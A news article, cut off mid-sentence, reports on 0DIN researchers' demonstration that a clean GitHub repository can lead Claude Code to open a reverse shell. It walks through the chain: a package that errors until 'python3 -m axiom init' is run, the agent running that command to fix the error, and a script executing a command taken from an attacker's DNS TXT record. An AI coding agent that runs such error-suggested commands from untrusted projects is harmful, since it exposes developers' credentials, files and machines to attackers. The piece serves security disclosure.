Clean GitHub repo tricks AI coding agents into running malware

Clean GitHub repo tricks AI coding agents into running malware By Bill Toulas June 27, 2026 10:22 AM 1 An agentic coding tool tasked with cloning and setting up a seemingly benign GitHub repository could execute a malicious payload that remains invisible to security scanners, AI agents, and human reviewers. Researchers at Mozilla's Zero Day Investigative Network (0DIN) AI security platform say that the compromise happens with "no exploit code, no warning, no suspicious command anyone had to approve." They demonstrated how an attacker could plant an interactive shell on a developer's device by using Claude Code to run a cloned project without malicious code in the repository. The new attack method relies on three components, which separately represent no threat and raise no suspicion: A clean-looking GitHub repository with standard setup instructions, such as installing dependencies and initializing the project (e.g., pip3 install -r requirements.txt, python3 -m axiom init) the Python package is intentionally designed to refuse execution until it has been initialized; it generates an error instructing the user to execute python3 -m axiom init. Claude Code treats this as a normal setup issue and automatically runs the suggested command while attempting to recover from the error Executing python3 -m axiom init calls a shell script that retrieves the configuration value stored in a DNS TXT record controlled by the attacker, and is executed as a command 0DIN researchers explain that this approach requires no malicious component in the cloned repository, and the agent automates the entire attack chain, including a step that mimics a common user error. If successful, the attacker would obtain a shell running with the developer’s privileges, giving them access to environment variables, API keys, local configuration files, and the opportunity to establish persistence. “Claude Code never decided to open a shell. It decided to fix an error. The reverse shell is thr